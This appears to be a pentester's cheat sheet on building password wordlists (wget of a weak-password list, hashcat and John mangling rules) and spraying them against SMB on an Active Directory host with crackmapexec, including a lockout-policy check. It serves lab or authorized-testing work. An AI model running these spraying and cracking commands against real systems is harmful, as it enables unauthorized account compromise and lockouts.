Take a wordlist
for example staticticaly meaningful
wget https://raw.githubusercontent.com/insidetrust/statistically-likely-
usernames/master/weak-corporate-passwords/english-basic.txt
cat users.txt >> english-basic.txt
or build your own based on user enumeration (SMB, RPC, WEB)
Building Yp Own Passowrd Wordlist
usernames including admins
seasons
password
<empty>
Rules Mangling with
Enrich your wordlist by rules, add a bit of that, reverse, mangle...
hashcat
hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.list
John The Ripper
john hashes --wordlist=mywordlist --rules=MyRuleSet
where rule file /etc/john/john.conf
[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"
[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2
[List.Rules:Double]
d
p5
[List.Rules:Reflect]
f
[List.Rules:Reverse]
r
Now you have a wordlists that fits, be prepared for online password attack by checking...
Account Policy
Determine the account policy on your infra Active Directory before you start to lock out accounts
crackmapexec smb 10.129.228.111 --pass-pol
Start to crack with
Crackmapexec smb
# usernames only
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt --continue-on-success
# with custom pass list
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lst